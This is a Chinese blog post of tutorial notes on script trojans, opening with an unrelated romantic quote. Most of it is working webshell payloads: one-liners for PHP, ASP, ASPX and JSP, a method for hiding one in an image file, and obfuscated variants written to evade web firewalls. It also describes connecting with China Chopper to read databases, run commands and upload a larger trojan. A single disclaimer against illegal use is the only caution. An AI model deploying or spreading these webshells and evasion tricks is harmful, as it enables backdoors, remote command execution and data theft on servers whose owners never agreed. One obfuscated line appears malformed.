美文网首页
某教程学习笔记(一):13、脚本木马原理

某教程学习笔记(一):13、脚本木马原理

作者: 玉宾 | 来源:发表于2020-02-25 21:10 被阅读0次

    我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。

                                                                                                                                                                     ----  网易云热评

    一、一句话木马,隐蔽性强,功能强大,为上传大马做准备

    1、php一句话

    <?php @eval($_POST['aiyou']);?>

    将一句话上传到服务器

    用菜刀连接

    读取数据库

    终端运行命令

    2、asp一句话

    <% eval request("aiyou") %>

    3、aspx一句话

    <%@ Page Language="Jscript"%>

    <%eval(Request.Item["value"],"unsafe");%>

    4、jsp一句话

    <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

    5、图片马

    cmd下做一句话

    copy /b1.jpg+1.php 2.jpg

    C32ASM做一句话

    二、一句话变形,waf会拦截一句话,可以通过变形绕过

    <?php $_request['a']($_request['b']); ?>

    <%eval(request(chr(112)))%>

    <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("aiyou"))%>

    <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&-"&"5"&")"&")")%>

    <%a=request("aiyou")%><%eval a%>

    三、大马,功能比小马的功能更加强大

    上传小马后用菜刀连接,然后再通过菜刀上传大马

    禁止非法,后果自负

    欢迎关注公众号:web安全工具库

    相关文章

      网友评论

          本文标题:某教程学习笔记(一):13、脚本木马原理

          本文链接:https://www.haomeiwen.com/subject/afsqchtx.html